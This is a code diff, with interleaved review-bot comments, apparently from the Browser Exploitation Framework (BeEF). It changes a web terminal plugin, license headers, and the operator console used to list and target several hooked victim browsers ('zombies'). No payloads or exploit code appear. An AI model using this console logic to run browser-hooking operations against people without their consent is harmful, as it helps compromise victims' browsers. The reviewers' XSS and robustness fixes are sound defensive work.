', + + // AUTOCOMPLETE + // Is Autocomplete feature Enabled + // Please see the manual on how AUTOCOMPLETE is implemented + AUTOCOMPLETE : true, + + // HISTORY + // Is Command History Enabled + HISTORY : true, + + // HISTORY + // No of entries to be stored in HISTORY + HISTORY_ENTRIES : 100, + + + // AJAX_METHOD + // The HTTP Method that must be used for Ajax Requests + AJAX_METHOD : 'GET', + + + // AJAX_PARAMETER + // The GET/POST parameter that should be used to make requests + AJAX_PARAM : 'tokens', + + // ERROR_PREFIX + // Prefix For Error Messages + ERROR_PREFIX : 'An Error Occured: ' + + }; + }; + + + /** + * @property : dispatch + * @accessor : $.register_command ( See Below ) + * @private + * @desc : + * + * dispatch table stores command name and action + * to be taken when user enters a command. See + * Manual for more details on how to implement + * your own commands + * + **/ + var dispatch = { + }; + + + /** + * + * @method : wterm + * @public + * @desc : Sets up the terminal on the JQ object that + * represents a ( or a group ) of HTML NODE (s) + * + **/ + $.fn.wterm = function( options ) { + + + // Merge defaults with options + var settings = get_defaults(); + $.extend( true, settings, options ); + + // JQ Plugin surprised?? + return this.each( function() { + + + var element = $( this ); + var history = [ ]; + var hcurrent = null; + + // Set up some markup in the element + // required for terminal emulation + element.addClass( settings.TERMINAL_CLASS ).addClass( settings.THEME_CLASS_PREFIX + settings.DEFAULT_THEME ); + if( settings.WIDTH && settings.HEIGHT ) element.css( { width: settings.WIDTH, height: settings.HEIGHT } ) + element.html( '' ).append( '
' + settings.WELCOME_MESSAGE + '
' ); + + element.append( '
' ); + element.append( '
' + settings.PS1 + ' ' + + '
' ); + + + // Representing prompt, form, input and content section + // in the terminal + var _prompt = element.find( 'div:last span:last' ); + var input_form = element.find( 'div:last form' ); + var input = element.find( 'div:last form input' ); + var content = element.find( '.' + settings.CONTENT_CLASS ); + + // Custom Dispatcher + var cdispatch = null; + + // Temprary storage for autocomplete configuration + var ac_save = null; + + // Temporary store for current prompt + var cprompt = null; + + // Curson always needs to be on the prompt + input.focus(); + element.click( function() { input.focus(); } ); + + + /** + * @method : hide + * @private : + * @desc : Hides the prompt + **/ + var hide = function() { + _prompt.hide(); + }; + + /** + * @method : show + * @private : + * @desc : Shows the prompt + **/ + var show = function() { + _prompt.show(); + input.focus(); + }; + + /** + * @method : update_content + * @private : + * @desc : Updates the content section + * @args : current_prompt, command, data + **/ + var update_content = function( p, cmd, data ) { + content.append( '
' + p + ' ' + cmd + '
' + ( ( data ) ? data : '' ) + '
' ); + }; + + /** + * @method : clear_content + * @private : + * @desc : Updates the content section + * @args : current_prompt, command, data + **/ + var clear_content = function() { + content.html( '' ); + }; + + // Add the command to the dispatch + dispatch.clear = clear_content; + + + + /** + * @method : set_prompt + * @private : + * @desc : Set the current prompt + * @args : string + **/ + set_prompt = function( p ) { + if( p && p.length ) element.find( '.' + settings.PROMPT_CLASS).html( p + ' ' ); + }; + + + + /** + * + * @method : Anonymous + * @private : + * @event_handler + * + **/ + input_form.submit( function( e ) { + e.preventDefault(); + e.stopPropagation(); + + var value = input.attr( 'value' ); + + if( settings.HISTORY ) { + if( history.length > settings.HISTORY_ENTRIES ) history.shift(); + history.push( value ); + } + + // Reset The Input + input.attr( 'value', '' ); + var tokens = value.split( /\s+/ ); + var key = tokens[0]; + + hide(); + + var get_current_prompt = function() { + return ( cprompt ) ? cprompt : settings.PS1; + } + + var _dispatch = function( key, tokens ) { + + if( typeof key === 'function' ) { + data = key( tokens ); + /* + * antisnatchor: preventing XSS + */ + if( data ) { update_content( get_current_prompt(), $jEncoder.encoder.encodeForJavascript(value), data)} + } else if( typeof key === 'string' ) { + var to_send = { }; + to_send[ settings.AJAX_PARAM ] = tokens.join( ' ' ); + + var on_complete = function( data, text_status ) { + update_content( get_current_prompt(), value, data ) + }; + + $[ settings.AJAX_METHOD.toLowerCase() ]( key, to_send, on_complete ); + } + }; + + if( key == '' ) { + update_content( get_current_prompt() , '' ) + } else if( cdispatch && key == 'exit' ) { + + // Recover old configuration and Dispatch exit hook + settings.AUTOCOMPLETE = ( ac_save ) ? 
ac_save : false ; + + // Todo: test what happens when exit hook is not defined + if( cdispatch.EXIT_HOOK ) { + _dispatch( cdispatch.EXIT_HOOK, tokens ); + } else { + _dispatch( function() { return '' }, tokens ); + } + + // Clear temporary values + cdispatch = null; + cprompt = null; + + // Reset the prompt + set_prompt( settings.PS1 ); + + } else if( cdispatch ) { + + // Dispatch to the custom dispatcher + _dispatch( cdispatch.DISPATCH, tokens ); + + } else if( dispatch[ key ] ) { + if( typeof dispatch[ key ] === 'object' ) { + cdispatch = dispatch[ key ]; + cprompt = cdispatch.PS1 || key; + set_prompt( cprompt ); + + ac_save = settings.AUTOCOMPLETE; + settings.AUTOCOMPLETE = false; + + // Todo:See what happens if start hook is not defined + if( cdispatch.START_HOOK ) { + _dispatch( cdispatch.START_HOOK, tokens ); + } else { + // A stupid Hack + _dispatch( function() { return '' }, tokens ); + } + } else { + _dispatch( dispatch[ key ], tokens ); + } + } else { + update_content( settings.PS1, value, settings.NOT_FOUND.replace( 'CMD', tokens[0] )); + } + + show(); + + + } ); + + + /** + * + * @method : Anonymous + * @private : + * @event_handler + * + **/ + input.keydown( function( e ) { + var keycode = e.keyCode; + switch( keycode ) { + + case 9: + + e.preventDefault(); + + if( settings.AUTOCOMPLETE ) { + var commands = [ ]; + var current_value = input.attr( 'value' ); + // Command Completion + if( current_value.match( /^[^\s]{0,}$/ ) ) { + for( i in dispatch ) { + if( current_value == '' ) { + commands.push( i ); + } else if( i.indexOf( current_value ) == 0 ) { + commands.push( i ); + } + } + + if( commands.length > 1 ) { + update_content( settings.PS1, current_value, commands.join( '
' ) ); + } else if( commands.length == 1 ) { + input.attr( 'value', commands.pop() + ' ' ); + } + } + } + + break; + + // History Up + case 38: + e.preventDefault(); + if( settings.HISTORY ) { + hcurrent = ( hcurrent === null )? history.length - 1 : ( hcurrent == 0 ) ? history.length - 1 : hcurrent - 1; + input.attr( 'value', history[ hcurrent ] ); + } + break; + + // History Down + case 40: + e.preventDefault(); + if( settings.HISTORY ) { + if( hcurrent === null || hcurrent == (history.length - 1 ) ) break; + hcurrent++; + input.attr( 'value', history[ hcurrent ] ); + } + break; + + default: + break; + } + }); + }); + + }; + + + $.register_command = function( command, dispatch_method ) { + try { + if( typeof dispatch_method === 'function' || typeof dispatch_method === 'string' || typeof dispatch_method === 'object' ) { + dispatch[ command ] = dispatch_method; + } else { + throw 'Dispatch needs to be a method'; + } + } catch ( e ) { + // Error Handling here + } + }; + +})( jQuery ); diff --git a/extensions/autoloader/config.yaml b/extensions/autoloader/config.yaml index dc560be9f..419798363 100644 --- a/extensions/autoloader/config.yaml +++ b/extensions/autoloader/config.yaml 
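Review bot: The XSS fix in `_dispatch` covers only the function branch, and it applies a JavaScript-context encoder to a value that `update_content` concatenates into markup for `content.append`. The string (AJAX) branch still passes the raw `value` and the response `data` from `on_complete`, the not-found branch substitutes the raw `tokens[0]` into `settings.NOT_FOUND`, and the Tab-completion handler passes the raw `current_value`. HTML-encode the command text at each of those calls, for example `update_content( get_current_prompt(), $jEncoder.encoder.encodeForHTML( value ), data )` and `settings.NOT_FOUND.replace( 'CMD', $jEncoder.encoder.encodeForHTML( tokens[0] ) )`, or encode `cmd` once inside `update_content` and drop the per-call encoding. Whether `data` may be treated as markup depends on the endpoint registered for the command, which is not visible in this file.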
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/autoloader/extension.rb b/extensions/autoloader/extension.rb index 241d02885..b63fbf399 100644 --- a/extensions/autoloader/extension.rb +++ b/extensions/autoloader/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/autoloader/model.rb b/extensions/autoloader/model.rb index a6f268706..c83c441b5 100644 
--- a/extensions/autoloader/model.rb +++ b/extensions/autoloader/model.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/extensions/console/config.yaml b/extensions/console/config.yaml index 6612e66d3..baa7e4865 100644 --- a/extensions/console/config.yaml +++ b/extensions/console/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: 
diff --git a/extensions/console/extension.rb b/extensions/console/extension.rb index 8574e46cc..cd3253a8a 100644 --- a/extensions/console/extension.rb +++ b/extensions/console/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/console/lib/command_dispatcher.rb b/extensions/console/lib/command_dispatcher.rb index ffade9889..d74602bb7 100644 --- a/extensions/console/lib/command_dispatcher.rb +++ b/extensions/console/lib/command_dispatcher.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/console/lib/command_dispatcher/command.rb b/extensions/console/lib/command_dispatcher/command.rb index 465dd3b8f..e3fb00db6 100644 --- a/extensions/console/lib/command_dispatcher/command.rb +++ b/extensions/console/lib/command_dispatcher/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension 
@@ -53,10 +43,10 @@ class Command print_line("Module name: " + driver.interface.cmd['Name']) print_line("Module category: " + driver.interface.cmd['Category']) print_line("Module description: " + driver.interface.cmd['Description']) - print_line("Module parameters:") + print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0 driver.interface.cmd['Data'].each{|data| - print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter") + print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label']) } if not driver.interface.cmd['Data'].nil? end @@ -168,4 +158,4 @@ class Command end -end end end end \ No newline at end of file +end end end end diff --git a/extensions/console/lib/command_dispatcher/core.rb b/extensions/console/lib/command_dispatcher/core.rb index 2a1f81a99..59ac7c82a 100644 --- a/extensions/console/lib/command_dispatcher/core.rb +++ b/extensions/console/lib/command_dispatcher/core.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension 
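Review bot: `driver.interface.cmd['Data'].length` is evaluated on the `print_line("Module parameters:")` line before the `.nil?` guard that follows the `each` block, so a module whose 'Data' is nil raises NoMethodError before that guard is reached. Take the value once with a default, `params = driver.interface.cmd['Data'] || []`, then use `print_line("Module parameters:") unless params.empty?` and iterate over `params`. The rewritten output line also concatenates `data['ui_label']` directly, which raises TypeError when a parameter has no label; `data['ui_label'].to_s` would match the `.to_s` already applied to `data['value']`. The enclosing method starts and ends outside the hunk.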
@@ -47,10 +37,14 @@ class Core end def cmd_back(*args) - if (driver.current_dispatcher.name == 'Command') - driver.remove_dispatcher('Command') - driver.interface.clearcommand #TODO: TIDY THIS UP - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + if (driver.current_dispatcher.name == 'Command') + driver.remove_dispatcher('Command') + driver.interface.clearcommand #TODO: TIDY THIS UP + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ") + end elsif (driver.current_dispatcher.name == 'Target') driver.remove_dispatcher('Target') driver.interface.cleartarget @@ -147,11 +141,12 @@ class Core [ 'Id', 'IP', + 'Browser', 'OS' ]) BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie| - tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))] + tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')] end puts "\n" @@ -178,11 +173,12 @@ class Core [ 'Id', 'IP', + 'Browser', 'OS' ]) BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie| - tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))] + tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')] end puts "\n" 
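Review bot: The single-versus-multiple prompt `if`/`else` added here in `cmd_back` is repeated in three more hunks of this commit (`@@ -213,23 +209,30 @@` and `@@ -287,13 +290,16 @@` in core.rb, and `@@ -159,7 +149,12 @@` in target.rb), and the copies already disagree. The `setofflinetarget` copy formats the single id with `driver.interface.targetid.to_s` where the others use `driver.interface.targetid.first.to_s`; if `targetid` is an array on that path the prompt shows the array's inspect form, and if it is not an array then `.length` and `.join` are the wrong calls. `setofflinetarget` is not visible here, so that needs confirming. One helper on the interface that returns the prompt prefix for the current target list, called from all four sites, would keep them in step. `cmd_back` continues outside the hunk.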
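Review bot: The new `tbl <<` row in the hunk at `@@ -147,11 +141,12 @@` concatenates `BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BrowserDetails.get(zombie.session, 'BrowserVersion')` with no nil check, although shellinterface.rb in this same commit tests the `BD.get` results it adds with `.nil?` before using them. A session with no recorded browser name would raise NoMethodError and abort the whole listing; the identical line is added in the hunk at `@@ -178,11 +173,12 @@`. Calling `.to_s` on each `get` result before joining keeps the table rendering. These fields are presumably populated from what the hooked browser reports, so stripping control characters before they are written to the operator's terminal would also be sensible.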
@@ -213,23 +209,30 @@ class Core BeEF::Core::Models::HookedBrowser.all(:lastseen.gt => (Time.new.to_i - 30)).each do |zombie| onlinezombies << zombie.id end - - if not onlinezombies.include?(args[0].to_i) - print_status("Browser does not appear to be online..") - return false - end - - if not driver.interface.settarget(args[0]).nil? + + targets = args[0].split(',') + targets.each {|t| + if not onlinezombies.include?(t.to_i) + print_status("Browser [id:"+t.to_s+"] does not appear to be online.") + return false + end + #print_status("Adding browser [id:"+t.to_s+"] to target list.") + } + + if not driver.interface.settarget(targets).nil? if (driver.dispatcher_stack.size > 1 and driver.current_dispatcher.name != 'Core') - driver.destack_dispatcher - driver.update_prompt('') + driver.update_prompt('') end - + driver.enstack_dispatcher(Target) - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ") + end end end @@ -287,13 +290,16 @@ class Core if not driver.interface.setofflinetarget(args[0]).nil? if (driver.dispatcher_stack.size > 1 and driver.current_dispatcher.name != 'Core') - driver.destack_dispatcher - driver.update_prompt('') + driver.update_prompt('') end driver.enstack_dispatcher(Target) - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") + end end end @@ -381,4 +387,4 @@ class Core end -end end end end \ No newline at end of file +end end end end 
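Review bot: `targets = args[0].split(',')` runs before any visible check that an argument was supplied, so calling the command with no id raises NoMethodError on nil unless a line above the hunk already returns. The online check compares `t.to_i`, but the unconverted strings are what reach `driver.interface.settarget(targets)`; `"3abc".to_i` is 3 in Ruby, so an entry can pass the check while a different string is stored and later joined into the prompt. Convert and validate once, e.g. `targets = args[0].to_s.split(',').map { |t| Integer(t) rescue nil }` then `return false if targets.empty? || targets.include?(nil)`, and use the same values for the check and for `settarget`, assuming `settarget` accepts integers. The method begins above the hunk.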
diff --git a/extensions/console/lib/command_dispatcher/target.rb b/extensions/console/lib/command_dispatcher/target.rb index a7b737360..0eaf4deeb 100644 --- a/extensions/console/lib/command_dispatcher/target.rb +++ b/extensions/console/lib/command_dispatcher/target.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -28,7 +18,7 @@ class Target begin driver.interface.getcommands.each { |folder| folder['children'].each { |command| - @@commands << folder['text'] + "/" + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") + @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") } } rescue @@ -73,9 +63,9 @@ class Target driver.interface.getcommands.each { |folder| folder['children'].each { |command| - tbl << [command['id'].to_s, - folder['text'] + "/" + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"), - command['status'], + tbl << [command['id'].to_i, + folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"), + command['status'].gsub(/^Verified /,""), driver.interface.getcommandresponses(command['id']).length] #TODO } } 
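Review bot: Dropping the `"/"` in `folder['text'] + command['text']...` here and in the hunk at `@@ -73,9 +63,9 @@` makes the command path correct only when every `folder['text']` already ends in `/`. The shellinterface.rb hunks in this commit append the slash for categories from `get_categories` and `get_enabled`, but the path for dynamic modules read from the database is not in the diff, so a folder without the trailing slash would yield names like `NetworkPing` that no longer match what the user types. Normalising at the point of use, `folder['text'].chomp("/") + "/" + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")`, removes that dependency. In the second hunk `command['status'].gsub(/^Verified /,"")` also assumes the status is never nil, which is worth a `.to_s` unless `get_command_module_status` always returns a string.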
@@ -159,7 +149,12 @@ class Target driver.enstack_dispatcher(Command) if driver.dispatched_enstacked(Command) == false - driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] / "+driver.interface.cmd['Name']+" ") + if driver.interface.targetid.length > 1 + driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] / "+driver.interface.cmd['Name']+" ") + else + driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] / "+driver.interface.cmd['Name']+" ") + end + end def cmd_select_help(*args) @@ -179,4 +174,4 @@ class Target end -end end end end \ No newline at end of file +end end end end diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index a896184cb..98b60941c 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -60,6 +50,9 @@ class ShellInterface tree = [] BeEF::Modules.get_categories.each { |c| + if c[-1,1] != "/" + c.concat("/") + end tree.push({ 'text' => c, 'cls' => 'folder', 
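Review bot: `c.concat("/")` in the hunk at `@@ -60,6 +50,9 @@` appends to the string object yielded by `BeEF::Modules.get_categories` in place, and the `else` branch of the hunk at `@@ -68,7 +61,21 @@` does the same to `mod['category']` through the alias `flatcategory = mod['category']`. If those are the strings held in the loaded module configuration rather than copies (not visible here), building the console tree rewrites category names for every other reader of that configuration. Build a new string instead: `c = c + "/" unless c.end_with?("/")` and `flatcategory = mod['category'].end_with?("/") ? mod['category'] : mod['category'] + "/"`. The array branch could likewise be `flatcategory = mod['category'].join("/") + "/"`, which avoids the `<<` loop.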
@@ -68,7 +61,21 @@ class ShellInterface } BeEF::Modules.get_enabled.each{|k, mod| - update_command_module_tree(tree, mod['category'], get_command_module_status(k), mod['name'],mod['db']['id']) + + flatcategory = "" + if mod['category'].kind_of?(Array) + # Therefore this module has nested categories (sub-folders), munge them together into a string with '/' characters, like a folder. + mod['category'].each {|cat| + flatcategory << cat + "/" + } + else + flatcategory = mod['category'] + if flatcategory[-1,1] != "/" + flatcategory.concat("/") + end + end + + update_command_module_tree(tree, flatcategory, get_command_module_status(k), mod['name'],mod['db']['id']) } # if dynamic modules are found in the DB, then we don't have yaml config for them @@ -245,7 +252,7 @@ class ShellInterface 'os' => [BD.get(hook_session_id, 'OsName')]}) when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING - return "Verfied Not Working" + return "Verified Not Working" when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY return "Verified User Notify" when BeEF::Core::Constants::CommandModule::VERIFIED_WORKING @@ -336,7 +343,7 @@ class ShellInterface page_name_row = { 'category' => 'Host', - 'data' => encoded_date_stamp, + 'data' => encoded_date_stamp_hash, 'from' => 'Initialization' } @@ -358,6 +365,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the os name + hw_name = BD.get(self.targetsession, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the browser name browser_name = BD.get(self.targetsession, 'BrowserName') if not browser_name.nil? 
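Review bot: The comment on the block added at `@@ -358,6 +365,21 @@` reads `# set and add the return values for the os name`, but the block reads `BD.get(self.targetsession, 'Hardware')`; it looks copied from the OS block and should say `# set and add the return values for the hardware name`. The row-building lines are the same as in the neighbouring blocks and in the HasPhonegap hunk at `@@ -535,6 +557,21 @@`, so a small private helper taking the category, label and value, and doing the `CGI.escapeHTML` call in one place, would remove the repetition and make it harder to forget the escaping in a future field. The enclosing method starts and ends outside the hunk.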
@@ -535,6 +557,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for HasPhonegap + has_phonegap = BD.get(self.targetsession, 'HasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(self.targetsession, 'HasGoogleGears') if not has_googlegears.nil? diff --git a/extensions/console/shell.rb b/extensions/console/shell.rb index 89cc6b20d..84d523ebb 100644 --- a/extensions/console/shell.rb +++ b/extensions/console/shell.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # require 'rex' diff --git a/extensions/customhook/api.rb b/extensions/customhook/api.rb index 90a47bdb9..d3fe850b6 100644 --- a/extensions/customhook/api.rb +++ b/extensions/customhook/api.rb 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/customhook/config.yaml b/extensions/customhook/config.yaml
index 9daf85e72..fe677fc14 100644
--- a/extensions/customhook/config.yaml
+++ b/extensions/customhook/config.yaml
@@ -1,17 +1,7 @@
 #
